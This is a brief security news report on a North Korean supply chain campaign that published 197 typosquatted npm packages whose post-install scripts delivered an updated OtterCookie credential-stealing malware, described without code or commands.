A sophisticated software supply chain attack has been identified, involving North Korean state-sponsored hackers. The threat actor successfully published 197 malicious packages to the npm (Node Package Manager) registry with the objective of distributing an updated version of the OtterCookie malware.

The campaign represents a significant effort to compromise developers by injecting malicious code into the open-source software ecosystem. Security researchers who discovered the packages attribute the activity to established North Korean threat groups known for targeting the technology and software development sectors.

Attack Vector: Malicious npm Packages

The core of the attack involved the deployment of 197 distinct packages on the public npm repository. These packages were engineered to appear legitimate, often using names similar to popular libraries to trick developers into installing them. This technique is a form of typosquatting.

Once a malicious package was installed as a dependency in a developer’s project, a post-install script was executed. This script initiated the download and execution of the primary payload, the OtterCookie malware, from an attacker-controlled command-and-control (C2) server. The npm security team was notified of the malicious packages to initiate their removal from the registry.

OtterCookie Malware Analysis

The payload delivered in this campaign is a newly identified, updated variant of the OtterCookie malware. OtterCookie is a known information stealer and credential harvester. Its primary function is to exfiltrate sensitive data from compromised systems.

This version of the malware is specifically designed to steal browser data, including cookies, login credentials, and browsing history. The stolen information is then transmitted back to the attackers’ infrastructure. The updates to the malware focused on enhancing its persistence and evasion capabilities to avoid detection by security software.

Source: https://thehackernews.com/2025/11/north-korean-hackers-deploy-197-npm.html